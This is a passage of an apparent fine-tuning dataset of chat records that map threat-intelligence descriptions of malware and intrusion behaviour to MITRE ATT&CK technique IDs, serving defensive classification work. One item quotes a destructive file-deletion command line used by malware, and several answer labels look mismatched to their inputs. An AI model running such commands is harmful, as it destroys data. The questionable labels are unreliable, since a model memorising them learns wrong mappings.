- "content": "The cheat sheet is separated into several sections, based on the purpose of the example commands. Fortunately, the commands listed in the cheat sheet provides us with a great deal of insight into some of the tools and techniques the actors will possibly use after compromising the end system. The cheat sheet shows significant batch and PowerShell scripting and a preference for using RDP, as well as the following tools not provided natively in Windows (i.e. thc-hydra, Plink, Mimikatz, Powercat, ProcDump, SharpHound/BloodHound and PowerSploit). Table 1 shows the headers and a description of each section within the cheat sheet."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of KONNI has dropped a Windows shortcut into the Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT collects the MAC address, computer name, and CPU information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InnaputRAT has a command to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some SUGARDUMP variants required a user to enable a macro within a malicious .xls file for execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After analyzing the final payload, we determined the winner was… a Remote Administration Tool, which we have named ROKRAT. The address used in the email was 'kgf2016@yonsei.ac.kr' which is the contact email of the Korea Global Forum where the slogan in 2016 was \"Peace and Unification of the Korean Peninsula\". This fact gives more credit and legitimacy to the email. This file is decoded and finally an executable is launched: ROKRAT. This RAT has the added complexity that the command and control servers are legitimate websites. The malware uses Twitter and two cloud platforms, Yandex and Mediafire, apparently for both C2 communications and exfiltration platforms. Unfortunately, these platforms are difficult to block globally within organizations as their use can be viewed as legitimate in most cases. Additionally, these 3 platforms all make use of HTTPS connectivity, making it much more difficult to identify specific patterns or the usage of specific tokens"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor’s main objective for using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected – it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID – long MD5 string), encrypted and uploaded to the C2"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1083 - File and Directory Discovery', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN13 rolled many of these reconnaissance efforts into scripts to automate their processes. For example, they used pi.bat to iterate through a list of IP addresses in a file, execute a ping command and write the output to a file (Figure 6). A similar script used dnscmd to export a host’s DNS zones to a file."
- },
- {
- "role": "assistant",
- "content": "T1595.001 - Scanning IP Blocks', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has used Google Chrome's decryption and extraction operations."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can discover the hostname, computer name, and Windows version of a targeted machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has the ability to modify the Registry key \"HKCU\\Software\\ApplicationContainer\\Appsw64\" to store information regarding the C2 server and downloads."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use of trusted channels: BoomBox is a uniquely developed downloader used to obtain a later-stage payload from an actor-controlled Dropbox account. All initial communications leverage the Dropbox API via HTTPS. Opportunity for restraint: Consistent with other tools utilized by NOBELIUM, BoomBox, VaporRage, and some variants of NativeZone conduct some level of profiling on an affected system’s environment. Ambiguity: VaporRage is a unique shellcode loader seen as the third-stage payload. VaporRage can download, decode, and execute an arbitrary payload fully in-memory. Such design and deployment patterns, which also include staging of payloads on a compromised website, hamper traditional artifacts and forensic investigations, allowing for unique payloads to remain undiscovered"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dubbed ‘SpeakUp’, the new Trojan exploits known vulnerabilities in six different Linux distributions"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can retrieve OS name/architecture and computer/domain name information from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates and uses a VBScript as part of its persistent execution."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can gather the IP address from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects a list of active and listening connections by using the command netstat -nao as well as a list of available network mappings with net use."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower has the ability to enumerate `Uninstall` registry values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell can search for files in directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant can force the compromised system to function as a proxy server."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used Google Cloud's appspot service to host C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At face value, this current variant of OopsIE has a vast majority of its strings obfuscated, which can be deobfuscated by splitting the strings using the hyphen as a delimiter, treating each split value as an integer, subtracting one from each integer and converting each into a character"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin installs a `TCP` and `UDP` filter on the `eth0` interface."
- },
- {
- "role": "assistant",
- "content": "T1205.002 - Socket Filters"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can perform reconnaissance commands on a victim machine via a cmd.exe process."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperStack sets the registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA\\Restrict Anonymous value to 0 so anonymous logon users (i.e. null session connections) can list all account names and enumerate all shared resources on a remote share. The implant can then use the WNetAddConnection2 API call to connect to another remote device's IPC$ share. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from"
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has created local privileged users on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea can enumerate and map ICS-specific systems in victim environments."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can be used to establish persistence using a systemd service."
- },
- {
- "role": "assistant",
- "content": "T1543.002 - Create or Modify System Process: SysV/Systemd Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig has the ability to identify folders and files related to previous infections."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan uses the first four bytes of this hardware ID as a unique identifier for the system, which in our case was “0000”"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb is a passive and highly targeted backdoor capable of remotely exfiltrating sensitive information from a compromised AD FS server. It can also receive additional malicious components from a command-and-control (C2) server and execute them on the compromised server"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP for command and control communication."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has many names in the information security industry — it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. In some operations, they also do not directly communicate to the C2 server. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them"
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "[1] https://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/ [2] https://www.clearskysec.com/copykitten-jpost/"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link', 'T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth has used malicious VBS e-mail attachments for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Firstly, the Trojan will use the following regular expression to determine if the C2 server wishes to cancel the C2 communications: 216.58.192.174|2a00:1450:4001:81a::200e|2200::|download.microsoft.com|ntservicepack.microsoft.com|windowsupdate.microsoft.com|update.microsoft.com Additionally, the RogueRobin Trojan uses the regular expressions in Table 3 to confirm that the DNS response contains the appropriate data for it to extract information from"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used netstat -an on a victim to get a listing of network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch can download and execute or update malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next we compared the codebase for setting registry keys. The code reuse displayed in Figure 4 is the sequence that sets the IEHarden registry keys and other keys used throughout TidePool and Operation Ke3chang malware."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor installation sequence shows that it’s meant for persistence via /LaunchAgents/com.aex-loop.agent.plist and /Library/LaunchDaemons/com.aex-loop.agent.plist. It initiates the configuration file /Library/Caches/com.applestore.db to set the C&C server IP and for remote session information. Loading the bot plugins, this enables connection to the server to open and wait for commands, update the configuration file based on the commands received, and encrypt the file via AES CBC. If the configuration file already exists, it will decrypt once a new session starts"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a collection of Exfiltration modules that can access data from local files, volumes, and processes."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can spread itself by infecting other portable executable files on networks shared drives."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Currently LockerGoga does not support any worm-like capabilities that would allow it to self-propagate by infecting additional hosts on a target network. We have observed LockerGoga moving around a network via the server message block (SMB) protocol, which indicates the actors simply manually copy files from computer to computer"
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims."
- },
- {
- "role": "assistant",
- "content": "T1608 - Stage Capabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using commands, including net group and net localgroup, to enumerate the different user groups on the target network."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is used to execute programs and other actions at the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can use HTTP and HTTPS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT queries the Registry for specific keys for potential privilege escalation and proxy information. FELIXROOT has also used WMI to query the Windows Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 server response to a beacon sent by a variant of contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of use various XOR operations to encrypt C2 data."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CopyKittens has used Metasploit, Empire, and AirVPN for post-exploitation activities."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. The actors used the Windows net use command to connect to Windows admin shares to move laterally"
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to identify remote systems within a network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can delete files via `C:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 > Nul & rmdir /s /q`."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The FireEye FLARE team released a WMI repository-parsing tool that allows investigators to extract embedded data from the WMI repository and identify WMI persistence."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel can identify running processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The code of this module is loaded directly into the exploited application and has several methods of payload execution. One of method uses a very interesting technique of payload execution which is designed mostly to bypass modern anti-malware products. This uses an interesting bug in the Windows DDE component. It is not a secret that anti-malware systems trigger on special system functions that are called in the context of potential vulnerable applications to make a deeper analysis of API calls such as CreateProcess, WinExec or ShellExecute"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware terminates some processes and services, some examples of which are related to backup software and data related applications. It is likely that it does this as an attempt to debilitate any efforts the victim may take in performing backup and recovery operations after the ransomware attack"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill has been observed deleting the temporary files once they fulfill their task."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol can enumerate victims' local and external IPs when registering with C2."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures."
- },
- {
- "role": "assistant",
- "content": "T1589 - Gather Victim Identity Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can issue commands using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group malware can download additional files from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive has a function to use the OpenClipboard wrapper."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
